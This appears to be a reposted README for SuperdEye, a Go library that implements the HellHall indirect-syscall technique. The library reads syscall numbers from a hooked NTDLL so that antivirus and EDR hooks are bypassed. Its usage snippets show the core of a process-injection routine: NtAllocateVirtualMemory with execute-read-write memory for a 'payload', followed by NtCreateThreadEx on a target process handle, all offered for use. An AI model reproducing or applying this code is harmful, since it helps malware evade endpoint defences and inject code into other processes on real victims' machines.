dEEpEst
SuperdEye is an implementation of HellHall (a revised version of TartarusGate) in pure Go and Go assembler.
Its purpose is to scan a hooked NTDLL, recover the syscall number (SSN) of a function, and then issue an indirect syscall with it, so that user-mode hooks placed on those functions by AV/EDR products are never executed.
The SuperdEye package exposes SuperdSyscall, which performs an indirect syscall by function name.
For better usability, some syscalls are already wrapped so that their signatures are compatible with the official golang.org/x/sys/windows package.
More syscalls will be made compatible with the official windows package in the future (contributions are welcome in superdwrapper.go).
Usage
Just import the package and use it! SuperdSyscall takes the NT function name followed by the arguments of that function, and returns the NTSTATUS of the call and an error.
Code:
import (
	"fmt"
	"unsafe"

	"github.com/almounah/superdeye"
)
...
// Resolve the SSN of NtCreateThreadEx from ntdll and issue it as an indirect syscall.
// The argument list mirrors the native NtCreateThreadEx signature.
NTSTATUS, err = superdeye.SuperdSyscall("NtCreateThreadEx", uintptr(unsafe.Pointer(&hThread)), uintptr(0x1FFFFF), uintptr(0), handleProcess, pBaseAddress, uintptr(0), uintptr(0), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
if err != nil {
	// err is set when the syscall could not be issued at all (e.g. the SSN was not found),
	// as opposed to a non-zero NTSTATUS returned by the kernel.
	fmt.Println("Syscall was not executed... Likely the Syscall was not found or a bug...")
	fmt.Println(err.Error())
}
fmt.Println("Syscall NtCreateThreadEx Made with NTSTATUS ", NTSTATUS)
For better usability, some syscalls are already wrapped so that their signatures are compatible with the official golang.org/x/sys/windows package and accept its typed handles and constants directly.
Code:
import (
	"fmt"
	"unsafe"

	"github.com/almounah/superdeye"
	"golang.org/x/sys/windows"
)
...
// Wrapped form: the handle, allocation type and protection use the
// golang.org/x/sys/windows types and constants instead of raw uintptr values.
pBaseAddress, NTSTATUS, err := superdeye.NtAllocateVirtualMemory(windows.Handle(handleProcess), uintptr(0), uintptr(len(payloadClearText)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
if err != nil {
	fmt.Println("Syscall was not executed... Likely the Syscall was not found or a bug...")
	fmt.Println(err.Error())
}
fmt.Println("Syscall NtAllocateVirtualMemory Made with NTSTATUS ", NTSTATUS)
...